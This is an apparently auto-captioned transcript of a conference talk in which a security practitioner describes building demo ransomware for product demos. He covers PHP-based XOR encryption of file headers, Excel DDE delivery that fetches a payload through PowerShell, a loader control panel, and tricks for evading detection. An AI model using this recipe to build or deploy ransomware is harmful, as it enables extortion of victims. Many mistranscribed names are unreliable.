I Wrote My Own Ransomware; Did Not See 1 Iota of Bitcoin

yes good afternoon everybody I'm really happy to be here actually because second year in in Scotland I did a talk last year as well so I'm going to apologize if I put in swear words wellton it's okay just so essentially this talk came about because in 26th 2016 I'll get a little bit into that war there was a really significant rise in ransomware and at the time I was working for a product vendor and you know one of the things that they wanted to do was demonstrate how the solution could come back ransomware now I can't tell you the results of that for that particular vendor because of when I left the company there's certain disclosures or

NDA's that were in place so one disclaimer is I have never used this or we put released this into the public okay this was not done for for gain or profit at any time right so a little bit about me so I've been around in the industry for a long time it says 25 years 25 years actually more like 30 years I'm a lot older than I look those are different different versions of me over time that last image on the right is essentially lately I've been a little bit muted or or left you know unimpressed by what's going on there in our industry I run besides London I know some of you might be coming so I it's gonna be great

this year again and I'm a SS a UK chapter board member so we actually have a stand here this year if you want to come and find out what it's about so it's an interesting Association there's no certification process or anything like that it's about bringing people within the industry together and doing networking so in 2016 there was a lot of and somewhere as being delivered I mean it was to the point where you could see one every week a new variant of one of ransomware every week and it this led me to look at why do we have this proliferation of ransomware why are we doing why is this happening why did why it's such an interest in doing

ransomware and on the side I also had some some let's say job issues where people were like we need to demo we need em list so I decided to actually look at it take it apart and see how I could build my own but as I said earlier I did not release this anywhere and I'm not was never used except in a demo environment all right as demos plus I mean everything you'll see that you could basically decrypt the whole thing very easily so it's not that big so 2016 the year of ransomware there was such proliferation and we saw different versions of ransomware this is before one a cry okay one acquire was actually

for me I think was a wake-up call for our industry for people for the world and there's been less of activity compared to 2016 since wanna cry and I think is because people got success acceptable of what was going on plus you know you have the issue with with with malware tech being arrested in the US so some of it died down there still ransomware out there it's just it's died down in terms of the volume because our attitude has changed it even got to a point where towards the end of the year ransomware as a service was being sold on the dark web so you could actually buy around somewhere as a service and you would

could release it on your target victim the ransomware service would take it would take a cut and you would get the rest I didn't I mean this is really going into a full industrial process and we'll talk about that a little bit afterwards so one of the things that led me to do this research as well is that basically if you've ever worked for a product company you have the marketing guys were like we need to show that our product does this we can show them what we can do and then the sales guys going yeah we want to demo this but we can't demo it you know in a in a demo environment we sometimes we don't have

internet sometimes we don't have this we need to be able to do something locally in a VM we need to be able to do something in a controlled manner but to demonstrate the value and going beyond the you know video type value so I've seen that so what can I do what can I do well the easy answer was build something that you could do demo right and could brick give them a solution so that that's how this whole thing came about so let's go back to 2016 I said you know 2016 there was an enormous growth this is a sauce sauce proof proof point was tracking the growth of ransomware and if you look at the year it started a

variable by the end of the you know by by the end of September I mean we were talking about a seven hundred fifty two percent increase okay seven hundred and fifty two percent increase that's a massive increase of variance and ransomware being released in the in the wild one interesting thing in that study was that they actually saw of it at the beginning of the year it was mostly malicious documents and towards the end of the year wasn't malicious office documents came about there was very little URL and the explanation to that is that if you look at some of the technologies that we're putting into place and filtering on emails we can easily filter out bad in bad URLs and

emails and we can capture them as they're going out of the out of the company through the perimeter perimeter solutions however the attachment is a little bit more complicated so documents malicious office documents were some of the prime are some of the primary mechanisms where they deliver ransomware but in 2016 we saw something new which was a zip file with a Java Script attachment and if you look at the black line in this chart you see that over the year it just grew and grew because the malicious parties realized that number one it was getting through the traditional protection mechanisms and number two users were actually clicking on it so I actually run a honeypot I

don't know if you guys know as I've you in my attends so he's what he's a he's a sans into a response person as well so he runs a honeypot as well so we talked and I was like actually which I think it was last year besides a year before it besides F and we were talking we're talking about how we were tracking all these emails and then ransomware and we saw basically a frequency right so there's actually if you look at this chart over the year right you see the spikes you know the month starts very slowly if you look at like if you look at this this the month taught really slowly and then

it increases over time right over the month basically think production release schedules right if you're in if you've done if you do production IT what happens is usually when you're rolling out a new application you might start with the application and say okay at the beginning of the month you rolled it out to a few people then towards the end of the month you've up you've fixed all the bugs you've created a more stable version so you roll it out to more people right so and this is what we saw this is kind of what we were seeing the frequencies of emails that are going through if you deep dive into a month you actually see that it's even more

production type focused is where at the beginning of the week you get the bulk of emails and then towards the end you trail off and the you know the less you trail off and you get less frequency so there was like a rhythm in the sense that if you if you think about release schedules you release at the beginning of the week if something goes wrong you have the week to fix it in this case basically you were they were releasing at the beginning of the week and optimizing the delivery mechanism over the over the week and over the month we saw that there was a lot a majority and that in last and 2016 of zip files right

so the attachments would prior me as if fuzz if you look at the blue you know the blue the light blue at the top of the top of the the pie chart that's Office Word fast the purple was is Excel right so there's very little these ones are the ones I'm talking about it's very little of these Word documents were actually coming in because there was Microsoft actually fought about what was going on so they started to deactivate macros they started to actually protect the office infrastructure office applications themselves so you got it was less it was hard getting harder and harder to actually deliver ransomware virus documents so they switched the zip mechanism the advantage of doing the zip

mechanism as they could if needed password protect zip file if you password protect zip file it just goes through any kind of email solution but you have because it doesn't know how to read the zip file and they were they were zip file they were just addressing it as a JavaScript or a visual basic script and those were going through because most solutions don't actually take those scripts and D analyze them or a capable of analyzing them and you don't really have a signature to actually match this so what is ransom let me let's dig a little bit into ransomware right so the principles that this is a chart from f-secure right so they over time have

kind of highlighted the different variants of ransomware and if you look at 2016 you basically 2016 starts here and you look at the number of different variants were actually released over the months it's immense right compared to the previous years there was just an explosion of variants and some of them were very minor modifications some of them went from a java script to an executable for example so it's extremely prolific and there's a and there's a lot of action going on in 2016 essentially you'll find that job that these types of ransomware come in probably four different variations so the first one and the easiest one to actually do is you have a command line

based solution so there's a lot of ransomware in 2016 that started off essentially as either a Python script a PHP script and even PowerShell towards the end of the year as there's there was one the in the great gray box all it was was the ransomware I downloaded 7-zip and just 7-zip password password protected the files and that was just a batch file a Microsoft Windows batch file and the ways and they're doing this is because it's easy it's really it's really easy to get in and it's really easy to actually bypass security applications because I mean the command line basically says

we're in this world so if you look at basically what it does is it deploys 7-zip with a different name so a dot zero dot exe and then does the 7-zip command the thing with 7-zip is most you know endpoint protection systems will just flag it as okay because it's a valid it's a valid executable you know it's a valid tool and this is one of the problems with you know we're still seeing today is that because some of these malicious parties can actually use these tools against us there's no protection right because you're not going to disable PowerShell you can't really disable pouch now the only thing could do is monitor and control so the second type of real

rounds the second type threats where we see is essentially just using either an executable or a script and applying a shot or a hashing technique so these don't work very well because it's quite easy to reverse so when you hear that you know f-secure Kaspersky released a decryption tool whatever it's because it's usually one of these types these two types of ransomware because the passwords embedded in the script or the hash is really easy to decode so they can Baxter they can backtrack the hash after that you basically get into the more complex stuff so then you get into a binary that's using a real encryption technology right so a really encryption system so AES ghost deaths and Triple

DES rot13 or XOR so these essentially use a single secret key apply the encryption to the to the file and that key is also stored somewhere and they decrypt it right so the thing with the first two is it's actually quite easy to deploy you don't need you can embed the the key ins inside the the executable or the script on the third one you have two options you can embed the key but then you it's easy to find or you have to just basically generate a key and store it somewhere so you need an infrastructure in the back in the back end and that's where you get into your commander controls and you have and

and servers to actually manage this case so you need a key management system the fourth type is a lot more complex and rarely seen so those use RSA type encryption and the problem of that is you need a public key and a private key so essentially what happens is the ransomware connects to the back end control system requests the key the back end key management system generates a private key look it's securely in it in its infrastructure and gives the gives the ransomware the public key and the public key is used to encrypt the the endpoint typically so like if you get hit by ransomware if you get hit by the third type of the variant the third

variant on this list you'll see that your rights where know is always the same so it says you know you got around somewhere and pay Bitcoin this is your ID give us your ID the idea will always be the same because the encryption key is always the same if you have this the fourth one you'll get a separate different encryption encryption notice and ransomware though for each endpoint that gets affected because it just generated every time it hits an endpoint it generates a new key that's how the mechanism works so what are the stages of an attack so the stages of an attack are actually quite simple so there's the first of the liver mechanism so that's

typically an email phishing campaign then as the execution so that's when the phishing campaign you know the user opens it it executes some it executes a binary or a script script it then goes into the encryption phase so the encryption phase is essentially that's when it happens right that's when the file gets encrypted and you get your you lose access to your files very important here is that the encryption phase the good and proper round somewheres will encrypt first and rename second so if you have a solution that basically and I'll talk about this a little bit afterwards if your solution is looking at renaming a fast you're basically too late in most cases because the files

already encrypted inside you then have depending on the type of ransomware you have a spread phase so like one a cry basically would in fact you know it would affect the endpoint right encrypt and then it would spread to other it would look for other endpoints to to target the spread phase is actually optional essentially because depending on the it depends on the militia malicious actor and the infrastructure they have in the background and typically in parallel I mean I put it afterwards but in parallel to the spread you also display to ransom though there's also some activity in that encrypt phase that was the end of the clip phase which is the persistence so you add persistence mechanisms on to

the endpoint so that if the user reboots he gets and the the ransom note gets me displayed and you carry on like that so I'm going a little bit fast because it's time time conscious so let's get our hands dirty so that was the background so how do you actually build one of these things well it's a piece of software right so you think okay I'm going to go through software development lifecycle it's like no malicious party's not going to do that right the malicious actors I'm not going to go through a whole back-end process like this that said some of the organized some of the organized actors in the dark web actually do have a full software

development cycle for some of their CNC stuff alright so they actually have a plan they have QA they have help desks and things like that but that wasn't the goal so the goal is I wanted to see the attractiveness and the simplicity of actually deploying this right so I switched more to a mindmap type model right so thinking about software development what stages I need what I did I need in my software so this is the mind map of what I needed so sorry I'm thrown away for a sec so basically I decided okay so I have my Mansa whether I want to build so I need a delivery mechanism first so I have to think about

how I'm going to deliver it so email or web drive-by those are the two most common and that's what you usually see I decide to go for email so you ever you do a JavaScript and a zip or you do a word attachment this could be other things apart from JavaScript the most common as you know from the stats was it was JavaScript or the word attachment because this was a demo and it was quite you know I had to be simple I just left it as a well attachment then you get to the encryption phase so this is where it becomes more interesting because in the encryption phase you're actually going to build the software so you need to

have a programming environment so there's this different options you can do a PHP you can do PowerShell you can go all the way to the you know c-sharp iPhone c c++ depending on your preferences but if you choose that type of you know some of the more advanced programming languages it intensifies the complexity of your ransomware so you're not going to get a quick and easy dirty solution you then need your coat your actual code so the actual code is pretty simple you set the key right you pass the disk for each file you're going to look for files or a dark text excels it jeep a typical business files right you're not going to

encrypt everything there's a reason for that and I'll explain it a little bit later you also are not going to look through every folder essentially if you do look for every folder you might hit system folders and create a blue screen which is counterproductive you know and have your run phase so basically your own phase you're going to launch the script you're going to launch the encryptor and you're going to set your persistence and show their message now there is also a phase that I did is part of the process which is to deploy a dropper right so how many of you guys know what a dropper is right so this varies I've seen this varies so if the

malicious party wants to gain control and do lateral movement and do more than just ransomware you're going to need to deploy a dropper right it deploys a dropper so it deploys essentially you know your rat or I talked it like that the issue of that is in terms of remember this is for a demo environment so I wanted simplicity if you do a dropper you need a server need obfuscation techniques because those are actually detected by antivirus programs and you need a payload system right so you need to be able to build all that and I'll talk a little bit about that later but it's something to consider when you're doing this so then we go to

the encrypter right so you need to understand encryption essentially so if we go back in time the first type of encryption sorry I'm going Proms right now so type of encryption to anybody know what this is yeah say a bit louder so this is a Caesar cipher so a Caesar cipher was so for those you don't know basically Caesar during these campaigns he with his generals they wanted to share information privately so they came up with a simple system which we now call rot13 which is the second one here where you basically use some kind of tool which allows you to realign the layers right so in the Caesar cipher you basically they had a wheel which they would turn

depending on the day depending on the code that was in use and that would give him that be allow them to encrypt the date to encrypt the words and then decrypt him on the other side interestingly enough so a friend of mine in the u.s. used to work for the NSA a long time ago and he actually did something like this for CIA and they this is one of the first encryption systems the CIA used during the Cold War a variation of it so yeah so then I said like I said you have rot13 which is a very simple encryption system based on Caesar cipher when you go up to X soaring so using an xor principle where

you basically have an upstream data packet you apply any encryption key and then you have your encrypted information the advantage of an XOR is actually it's reversible very easily you then go into something more complicated which is a yes so if you know that's block cipher technology so you basically have an initialization vector you have your original data you apply the ciphertext and you keep applying it you know you apply the block you take the block reapply so if it takes for a certain period of time and then at the top right you have the RSA type encryption which is you have some kind of key which you apply mathematical module aspect to it so I was looking at these

encryption methods and I was like well a EES I could do it's very simple there's plenty of libraries it's public the problem is it's still quite complicated and you need you need a lot of libraries and I'll get into why you need a lot of libraries afterwards I didn't want this to be too complicated so at the end I just said okay let's just use X or X or is really simple right so it's exclusive disjunction so basically when you apply your key if you apply an X or two to a value with zero and equals zero if you do a if you buy the value to the X or the value to itself it's zero as well if

you start applying a key essentially you get this mathematical logic which basically says that you can the keys as long as the key stays the same it's equal to you can reverse it quite easily and it's equal to itself so that was the prints that's the key that's the system but I chose it's easy to implement there's plenty of single you know one line codes who actually do this it's really simple so that's the simplicity is a really good thing in this in this type of environment so what do you need well we've got a math we got the visit site on the encryption so I need a place to develop this why do you need the

place to develop this well think about it right you are going to do some code you're going to want to test that code so natural for developer right he writes his code compiles it runs it whatever any applies it any press it problem is if you accidentally if you accidentally hit something at the same time this happens you encrypt your environment so interestingly enough the first script I wrote to actually do this I've messed up the encryption algorithm well the encryption code and the reverse didn't work so I basically encrypted my environment luckily I did it in VMware and I said I was like ok so an hour's worth of work down the drain revert to

my snapshot and restart so that's why using VMware and snap strong technology yeah not necessarily VMware but using the virtual environment we have a snapshot technology and snapshotting often and frequently is really useful in this type of situation because it's really easy to make a mistake right so the principle that I decided on was to use a scripting technology but interpreter and download that interpreter well apply that interpret of our Word document and the reason I got into this situation is I was doing so it was doing some testing i recoup all the word document and then i accidentally hit enter on the keyboard because i was distracted and the focus was on the word document in explorer

over a document opened that was the end of the day okay so you've got to be careful what you're doing it's always good to have a vmware in place and you need to think about things like that so choose your tools wisely wisely vmware being one of them there's another aspect to the tools choosing the tools wisely because depending on the type of tool which usually you're going to have more or less functionality and ability to actually deploy if you're compiling a binary from scratch it's really easy the problem is you need a full development infrastructure so you need something like this right you need visual studio or eclipse so how many of you have used

visual story on an eclipse it's a [ __ ] resource hog right especially Eclipse I can't even open eclipse anymore cuz it's just noise crap out of me and I didn't want that I wanted something simple this is just I just needed to do this really quickly because I was like one week away from do it from from a sales kickoff where I needed to give this to the sales guys also the pre-sales guys so and it needs to be easy to deploy I originally tested this with PowerShell and funnily enough this was before they actually somebody actually launched the PowerShell scripting encryption the problem I found was but if you were hitting Windows 10 it worked really well

because Windows 10 has a full PowerShell stack inside if you were hitting it a windows 7 box it doesn't work mostly because when PowerShell really isn't enabled by default on Windows 7 you actually have to there's a very there's a version one though of power on Windows 7 but version 1.0 is very simplistic and it was really hard to actually get any get it to do proper encryption you could do it but it was just really hard and if you wanted to do it properly in some cases you actually needed to force the installation of Windows PowerShell so that was just an extra step I wasn't willing to go through so you have - you have PHP I ended up

choosing PHP and I'll get into that a little bit later it's just and you have your Word documents or zip the other good thing too is so because I was working in VM environment I used notepad plus past it's free plus it does code highlighting and I'm a lazy bugger so I like to have my code highlighted to make sure I'm using the right the right the right commands so that's choosing a tool right code breakdown so then I sat down so I used to do UML my past life so I said down say okay I'm going to try and give some structure to this and make sure that I know what I'm doing so I broke it down

it's a simple UML structure so I kicked off the program I set the key I set the starting path so that's important most ransom wears will just look for every disc on the end point and encrypt and even go to shares right I didn't need that I just needed to demonstrate simple ransomware is somebody taking over somebody's endpoint so I need to set the path a starting path so then so if you look at a structure of a file system the way it's described to the user is essentially you have a set of folders within folders and files within those folders right that is a tree so if you've done programming in your development in your life what's the

easiest way to pass a tree recursion all right you do a recursive function you just keep calling the function every time so what we so what we do here is basically we look for a folder if we have a folder we find the files inside we check that the files are certain type we encrypt the we renamed the file we looked there's more files if it's a directory we call ourself all right I didn't because of the space I didn't put the recursion in this in this so this is what the code looks like all right it's very simple so as I said I chose PHP for a reason I'll talk about it a bit but essentially I

set the code with a secret right so secret I encrypt it in base64 just for the foam it just to hide it in the script so a simple user if he finds the script and opens it can't see the key except I'm a little bit lazy so I didn't take out the comment so the keys up there so you can have very varying lengths of keys of course it doesn't really matter because your it's your it's your X or you functions it'll take care of the actual positioning you then start to pass your disk now we avoid these directories on windows there's some later on this and Mac ones as well does anybody know why I wants to avoid

those directories can Oh buddy think I've mentioned it a little bit earlier but why would I avoid the system directories yeah exactly somebody said it in front so you don't want if you do hit those directories and you encrypt something in those directories there's a good chance for your blue screen in the host right what you'll kill the host if you do that you'll stop encrypting and basically reboot and you haven't gotten to doing your or you might not have gone to your doing your persistence and so you you want to avoid that plus if you do do this if you do encrypt this stuff you might be encrypting things like notepad or the preview application and

if you do that you can't show you around somewhere no right you need to be able to well show you around somewhere note so you need to leave some functionality on the endpoint now it's true that you have some mint some around some wherever it will encrypt their BIOS but that's different model right we're just looking at file encryption here so then you're going to look for if you have a file you're going to look for all the files with certain extensions because again you don't want to encrypt dll's it might be useful you want to encrypt the data if it's important to the user or to the organization so you want to look for

office documents or subsets of office documents like text files zip files RAW files Excel Word you know anything that you can think of you can build a list right I kept it simple I look for the typical office documents then you open the file you open the file with right mode and then you do you apply your XOR right so this is the simple xor functionality right so you get the good thing with PHP is if you read a file into a buffer you basically have that buffer and you can address it as an array so the XOR you run your you run your loop over the array you apply your you apply your ordinal functions here

right so you apply you apply your your encryption here with the XOR then you rewrite the block now so anybody so some of you guys know PHP you know how this you know what this function does right so basically open the file and read 1024 bytes right so why am I only reading 1024 bytes so buddy can anybody guess speed yeah and the thing is you don't need to read that encrypt the whole file as long as you encrypt the head of the file the file becomes useless right most of the information on file systems regarding the file is at the front is at the header of the file right so the description of the structure of the file

the type of file that it is you have your magic you know your magic number in the head of the far so if you read the file from zero and read say like 1024 2048 4096 you have a smaller buffer to work with that means your application doesn't need that much memory to run and you basically encrypt the information but is going to kill the file anyway right so that's basically it very simple right what is this like 20 lines of code and it's roughly the same thing if you try to do an executable now why did I set for PHP and there are some gotchas when you're using an interpreted language on the first time I did it you know I just

downloaded the stock PHP PHP 5 ran it and it complained because it still needed a bunch of dll's right so when you're doing this type of stuff and when they're doing this type of stuff they're going back in time they know they're doing them they're going back to the simplest version of the interpreter which you can use so you have to go back to the right version of the interpreter if you go back far enough you don't need dll's for example the other thing too is something like PHP or Python is you can actually recompile your own interpreter and include everything inside the executable so why do you need to do it because essentially once you have this

right so you've got your PHP you got your a script you have to put it in your word document or you have to make it downloadable from somewhere so to ease that you want to have the simplest amount of information to put into your word document or to download from a website right so you want something simple and contain if you have to deploy multiple files on multiple dll's at the same time number one it gets more it gets bigger gets more complex plus its you'll start to hit detection x' right because you're installing a lot of files into the system lesser to install the less likely you're going to get to you the more chance you have of avoiding

detection plus by using the stock PHP you basically get a green light from the most of the antivirus vendors right if you run that if you if if you upload that into VT it comes out green because it's PHP

so if you go back and then do something simple you go back in time you basically have everything okay all right so your script runs there's no errors and you get an encrypted platform right so it's simplicity again right there's a theme to this and that's simplicity I want to keep it simple but I think also the malicious party is looking at simplicity so now you have your script you have your executable you need to wrap it up in a batch file and deliver it so the easiest thing I found to do was basically package this on to package this into a Vita word or a visual basic or excel dde all right now you can do this manually for if you know

how what you're doing in macros however it's quite easy to find tools like fro Docs readily available that will allow you to actually inject the macros and it's really cool because you inject the macros in a hidden fat hidden way right so you've got all the function names and everything like that and obfuscated the one that I really liked was using dde so I did one with Excel and using DD does everyone know what did he years so it's it's the data data something act extension so it essentially allows Excel to go query databases but you can actually get it to run CMD right so you're not using macros anymore as soon as you open the file it refreshes and

does the dde commands so basically what it does is it launches the CMD runs powershell powershell downloads my executable and then runs it that's simple enough for parish all to do and it runs on every version of PowerShell you can also do it with a simple batch script if you need to all right the advantage of doing that is you don't use VB so if V B is turned off in the in the environment that you're attacking it bypasses that restriction so then there's two you know you can either base64 the the executable put it into your Word document or that makes the script a bit more complex and I didn't like I said I'm a lazy bugger

so I didn't want to actually make this complex so I was at the time I was trying to I was building this AWS environment so I said oh well I can just pay a fine existence real cheap free for a year spin it up for a simple web server on it put my executor on the web server and point my script to that executable all right simple enough so you get my you get where I'm going with this right it's really simple to implement and deploy if you think about it so is that enough well as I said earlier my mind map there are some ran swears that use droppers so right now I have a functional ransomware

I tested it I can deploy it I just put it in an email fake email that I put on the demo system user opens a other pre sales guy opens it and then was the ransomware so hum is we start to see over the year well let me rephrase that so one of the reasons that I started this down this track is because some of the things I was seeing from my from my honeypot who is that campaigns would start with simple scripts like that right they would use simple scripting technology like that and over the top over time the variance would increase in complexity and they'd start adding rats and droppers all right so they could do

more things so I was like at this point I was like okay I have one I still I still got a few weeks to go before the kickoff before I have to demo this so I said okay I'll do a little bit more exploration right so loaders or droppers those are the most Commons as your fine invariance of them zero stride X by I Citadel camera all of those the only problem is anybody speak Russian so since we has read so hopefully this says that's what my Russian friend gave me you need an introduction and speak Russian is that roughly translate thank you so that is the problem right most of this stuff is run by Russian organizations on the dark

web and to get the latest and greatest version that isn't detectable you need to have an introduction into this environment you need to know people who will introduce you and vouch for you so you can find examples of them from the ones that have been detected and basically brought down so luckily I have a friend so he gave me a copy of Gowda X so this happens to be the control panel it's like what a CNC has a control panel yes full-blown control panel with stats and everything tells me how many of how many hits I've had how long have they been open for the past days the locations I have a map of where they've

got where they are so it's and then you have a full client ID you even get screenshots of the client all right so you can see what the guys working on parts you can this point you can script other things like that so I say ok this is simple enough again all I needed was a website I already had one because I was top I was I was publishing my executable on the website for it to be downloaded so I just added the gaud X back into it so there's there's a tool set to help you build your cowl-necks engine this is really cool in there it's it's the thing is it's like one of the reasons where we

see a lot of this stuff is because there are organizations in the background that are actually building it's it's a software industry this help desk or so to say it it's some of these things you can actually open tickets and I'll get back to you within 24 hours some of them have SL A's okay you need Bitcoin to pay for this but you know it's this this was one that's what he been deactivated so it was already pretty much useless but you know use if you use um you know usual tools you can actually you know recap a slightly and things like that hey it's got like you've got down here it's hard to see but in the profile you can add

things like anti debugging anti Olli anti VMware you have all these ass all these additional aspects right so okay this is really cool took me a couple hours to put into place our problem - is this you need a Russian phone because most of the instructions are in Russian except for the interface which is in English because you know you have to sell to everybody so this is the final product hopefully this will start yep so there's the phishing email ID bill a nice little phishing email so the guy opens the file so it says enable content now interestingly enough I made it really cool so you saw it it actually had some action to make the user more

susceptible originally the file was encrypted and you know he had to clean able to decrypt it so it decrypted now one of the things with the some of these tools is that this actually inserted a on closed macro ok because one of the things with if you're doing evasion techniques and especially if you're trying to evade some of these you know malware detection systems but also the explosion systems like fire I and stuff like that they all look for the unopen right so there's the unopen and this is running it's just the videos quite slow and there's a reason for that well it's not slow it's just this is the time it takes um so by doing it on clothes you're

avoiding some of those detection detection systems right there's also I've also introduced a significant time delay so anybody know why I want to just assume that the significant time line yeah yeah so by this and remember I'm doing a demo environment here I'm trying to show potential stammers the issue so there now I have the ransomware notice up and running if I go back to my source files they're all encrypted so there's a significant delay and that's intentional so the issue without the dropper without using gold eggs the initial topper was simple right the encryption program was simple to do the challenge really is to introduce those exports like guard X and build that system and doing the advanced techniques

the script and dropper and word file took me less than 24 hours to write okay including the thinking part and everything like that that's that was that third picture at the beginning of I'm me that was me thinking hard I'll she also half asleep but it pays okay there studies that 38% ransomware victims in 2016 were paying the ransomware but worse was that 59% of users even in enterprises were paying out of their own pocket because they were afraid to go to the IT Help Desk and say oh I've hit a bad email and my stations encrypted they were afraid of being punished you know and that's a cultural shift in an organization some of the reasons that this works is

because we've introduced such a scare tactics on our users saying is if this happens to you you know you [ __ ] the organization and all this and you're bad and blah blah blah no we need to think about awareness right because this is what happens 59% of hit victims will pay out of their own pocket because they don't want to be in trouble with the organization so we need a better way to do that user awareness when it comes to this type of activity so if you think about my effort of 24 hours and potential payout this is a a good return on investment guys especially when you look at some of them are like asking for $500 to get the

decryption key right I did do a version but standalone executable with with C C hash it took me a little bit longer but it was still within a week so in a week if I get if I was a malicious person and I got 5 or 10 people to pay right 500 dollars a pop a shot five grand for a week's worth of effort I mean I don't make them I don't make the much money on a in a week of course it is illegal and it is different that is potentially you could get into trouble some serious trouble so by selecting an interpreter type solution most Daviess won't trigger and this is why it's going past and some

next generation systems don't trigger either quite a few actually the problem is most next-generation 2 solutions they have this switch in their configuration which is block scripts so if you don't hit this switch it doesn't block any scripting stuff it only blocks executables right so you got to be careful when if you you if you're in the defense scenario you even if you're going into the some of this next-generation endpoint protection stuff you need to be careful about the settings there's a reason that they don't do those script locking techniques is because a lot of organizations use scripts to manage their infrastructure right how many of you ran is do you know ad structures you have a GPO does your

GPO deploy script to configure the workstation that would be blocked if you turned on script blocking so if you start to introduce exploit kits depending on how old they are then you start to get detected because that exploit kit is actually a rat it's actually doing you know zero day time activity so it's actually looking to it to exploit the machine so there's a little bit more structure I also did some uue ba right so endpoint behavioral analytics I tested some of that stuff too they look for massive file modification pattern massive file modifications over a short period of time right that's how they catch the ransomware they introduce latency into the loop to stop that right

if you don't if you have your script in the background running and you say encrypt one file wait a few minutes accredited I'll file your behavior and the next doesn't work test it detection that was that was tested with a product that I shall not name because I can't but she's smart you'll figure it out detection sometimes happens through filename extensions right so there's two problems of that number one is that the file name rename usually happens after you've encrypted the font so you're ready to late you might be able to block have to have the encryption over this but you basically lost part of your files in an enterprise environment that's okay because you've only lost

part of your files you can always recover those it's easier to recover but there's an easy way to get around that he randomized the extension on each launch and I've been working on that yet so each time you basically deliver your ransomware you change the encryption the encryption and the file extension most of the files extension detections are precoat are pre embedded into the configuration of the endpoint security solution it's a list that they have based on you know existing knowledge of which encryption which ransomware czar going out so there are ways to bypass all this stuff and that's one of the things that I could probably go back into actually now which is where we get

to the evolution of what I'm this is the idea here what I had was essentially evolve this system to see how I could get through evasion without actually going into drop-in to exploit techniques and things like that because there's simple ways to avoid detection like introducing latencies and things like that so it right I've stopped doing it that's not Mike I stopped doing for one reason is what might might one of my actual cats got sick and it was a very expensive to get him fixed and I hesitated all right but I don't do anything illegal so thank you that's something we're just on time right yeah so if you have any questions [Applause]